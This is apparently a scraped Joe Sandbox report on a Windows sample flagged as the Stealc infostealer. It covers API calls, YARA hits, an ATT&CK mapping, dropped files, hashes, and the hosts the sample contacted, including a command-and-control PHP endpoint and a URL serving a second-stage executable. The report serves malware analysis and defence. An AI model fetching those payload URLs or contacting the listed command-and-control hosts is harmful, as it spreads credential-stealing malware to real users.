                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: EnumSystemLocalesW,1_2_0043B2A2
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: EnumSystemLocalesW,1_2_0043B388
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_0043B415
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetLocaleInfoW,1_2_0043B665
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0043B78E
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetLocaleInfoW,1_2_0043B895
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0043B962
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: EnumSystemLocalesW,1_2_00434DED
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00417B90
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00B37DF7
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004029E0 GetNumberFormatW,GetTimeFormatW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,CreateNamedPipeA,SetFileShortNameW,CreateProcessW,GetTimeFormatW,GetModuleFileNameW,TlsGetValue,SetEnvironmentVariableA,GetTimeFormatW,GetModuleFileNameW,0_2_004029E0
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_00406F41 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00406F41
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00417850
                    Source: C:\Users\user\AppData\Local\Temp\81C9.tmp.exeCode function: 2_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00417A30
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_004027D0 GetNumberFormatW,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,EnumTimeFormatsW,GetTempFileNameW,IsBadCodePtr,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus,0_2_004027D0
                    Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 2.3.81C9.tmp.exe.b70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.81C9.tmp.exe.b70000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.b20e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.b20e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 81C9.tmp.exe PID: 7456, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 2.3.81C9.tmp.exe.b70000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.3.81C9.tmp.exe.b70000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.b20e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.b20e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.81C9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 81C9.tmp.exe PID: 7456, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_0076228C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_0076228C
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 0_2_007615B6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_007615B6
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,1_2_004218EC
                    Source: C:\Users\user\Desktop\VAIIBIHmtT.exeCode function: 1_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,1_2_00420C16

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts14
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		OS Credential Dumping2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts312
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol3
                    Clipboard Data                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing                    		NTDS135
                    System Information Discovery                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    Query Registry                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials131
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Virtualization/Sandbox Evasion                    		DCSync11
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                    Process Injection                    		Proc Filesystem11
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    VAIIBIHmtT.exe50%ReversingLabsWin32.Trojan.Generic
                    VAIIBIHmtT.exe100%AviraHEUR/AGEN.1306958
                    VAIIBIHmtT.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\81C9.tmp.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe34%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\81C9.tmp.exe34%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    post-to-me.com
                    		104.21.56.70
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://62.204.41.177/edd20096ecef326d.phptrue
                        		unknown
                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                          		unknown
                          http://62.204.41.177/true
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://post-to-me.com/track_prt.php?sub=&cc=DEVAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                              		unknown
                              https://post-to-me.com/track_prt.php?sub=VAIIBIHmtT.exefalse
                                		unknown
                                http://62.204.41.177/edd20096ecef326d.phpM81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://176.113.115.37/ScreenUpdateSync.exe8VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://62.204.41.177/edd20096ecef326d.phpQ81C9.tmp.exe, 00000002.00000002.2008550485.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWAREVAIIBIHmtT.exe, 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://post-to-me.com/VAIIBIHmtT.exe, 00000001.00000002.4169669321.0000000000736000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://upx.sf.netAmcache.hve.5.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://62.204.41.177)81C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://62.204.41.177/=81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://176.113.115.37/ScreenUpdateSync.exeVAIIBIHmtT.exe, VAIIBIHmtT.exe, 00000001.00000002.4169795931.0000000000775000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000003.4009441376.0000000000774000.00000004.00000020.00020000.00000000.sdmp, VAIIBIHmtT.exe, 00000001.00000002.4169669321.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://62.204.41.177/ows81C9.tmp.exe, 00000002.00000002.2008550485.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://62.204.41.17781C9.tmp.exe, 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, 81C9.tmp.exe, 00000002.00000002.2008489449.00000000007EE000.00000004.00000020.00020000.00000000.sdmptrue
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    176.113.115.37
                                                    		unknownRussian Federation
                                                    		49505SELECTELRUfalse
                                                    62.204.41.177
                                                    		unknownUnited Kingdom
                                                    		30798TNNET-ASTNNetOyMainnetworkFItrue
                                                    104.21.56.70
                                                    		post-to-me.comUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1542425
                                                    Start date and time:2024-10-25 22:36:08 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 50s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:10
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:VAIIBIHmtT.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:35489d9dc0929e90b0b89b4f569df8c1.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@6/7@1/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 60
                                                    • Number of non-executed functions: 319
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: VAIIBIHmtT.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    16:37:04API Interceptor10191019x Sleep call for process: VAIIBIHmtT.exe modified
                                                    16:37:33API Interceptor1x Sleep call for process: WerFault.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    176.113.115.37CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                    hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37/seed.exe
                                                    M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                    XQywAEbb9e.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37/seed.exe
                                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 176.113.115.37/seed.exe
                                                    62.204.41.177v32oH5Xhqw.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 62.204.41.177/edd20096ecef326d.php
                                                    104.21.56.70hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      post-to-me.comCHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 172.67.179.207
                                                      hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 104.21.56.70
                                                      M13W1o3scc.exeGet hashmaliciousStealcBrowse
                                                      • 172.67.179.207
                                                      InstallSetup.exeGet hashmaliciousStealcBrowse
                                                      • 172.67.179.207

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSBill Payment__8084746.htmlGet hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      ACTION required to activate your account - bp Supplier Portal.emlGet hashmaliciousUnknownBrowse
                                                      • 172.66.0.126
                                                      http://www.wattpad.comGet hashmaliciousUnknownBrowse
                                                      • 104.22.74.216
                                                      dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.97.3
                                                      https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZsGet hashmaliciousMamba2FABrowse
                                                      • 104.17.25.14
                                                      (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                      • 104.18.65.57
                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                      • 188.114.96.3
                                                      RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                      • 172.67.75.40
                                                      botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 104.30.170.32
                                                      http://ERICADLERCLOTHING.comGet hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      SELECTELRUla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                      • 92.53.102.17
                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                      • 95.213.162.65
                                                      SecuriteInfo.com.Program.RemoteAdmin.904.16436.20637.exeGet hashmaliciousFlawedAmmyyBrowse
                                                      • 95.213.191.237
                                                      jYDYjpSbvf.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC Stealer, RedLine, SmokeLoader, StealcBrowse
                                                      • 176.113.115.95
                                                      CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 176.113.115.37
                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 188.68.221.152
                                                      6706ad721d914_JuidePorison.exeGet hashmaliciousUnknownBrowse
                                                      • 176.113.115.33
                                                      hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 176.113.115.37
                                                      SecuriteInfo.com.Win32.CrypterX-gen.10335.644.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 188.68.221.152
                                                      248994713.exeGet hashmaliciousMicroClip, SmokeLoaderBrowse
                                                      • 31.184.253.220
                                                      TNNET-ASTNNetOyMainnetworkFIv32oH5Xhqw.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.177
                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 217.112.243.186
                                                      NK3SASJheq.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.176
                                                      jqLt8WnO6C.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.176
                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                      • 217.112.243.125
                                                      arm.elfGet hashmaliciousMiraiBrowse
                                                      • 217.112.243.192
                                                      xU6Ys3r4la.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.176
                                                      na.elfGet hashmaliciousMiraiBrowse
                                                      • 217.112.243.196
                                                      CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 62.204.41.176
                                                      na.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 62.204.52.104

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      37f463bf4616ecd445d4a1937da06e19RFQ_24196MR_PDF.vbsGet hashmaliciousGuLoaderBrowse
                                                      • 104.21.56.70
                                                      https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1Get hashmaliciousUnknownBrowse
                                                      • 104.21.56.70
                                                      https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                      • 104.21.56.70
                                                      oNL2jSvLHj.exeGet hashmaliciousStealc, VidarBrowse
                                                      • 104.21.56.70
                                                      Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.21.56.70
                                                      COMPROBANTE DE PAGO.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      • 104.21.56.70
                                                      Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.56.70
                                                      n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.21.56.70
                                                      Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 104.21.56.70
                                                      PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 104.21.56.70

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_81C9.tmp.exe_bc4642c7ae948eef13e4a6859ea587aa7a3_86f4c257_ac90cbf8-af1c-4af1-a963-43fca99a69d8\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9634562114790366
                                                      Encrypted:false
                                                      SSDEEP:96:FlaTBsBhsz7pnMQXIDcQhc6zrcETcw31Ygy+HbHg/opAnQr39DDWpsOyP6N+mtZ3:PwB90PD5njSXZrMZtzuiFpZ24IO8N
                                                      MD5:F6D6F36D314AAA4774019726F1C05FDA
                                                      SHA1:F8EDF93D08471190E1DD3B9D69E2D1B024B48DE5
                                                      SHA-256:CE0A7A664A77BD7502853A277BB6D95B0737402AD732283EF4016074D8147ABD
                                                      SHA-512:3ABC65D64CB77B4F03E5445435F350C882015F2A02156300FF5E54118B922EFF261F8A186D0827FDC3ADDEE693E53AC56EB74EAA46B5DBBA7515A047D629849A
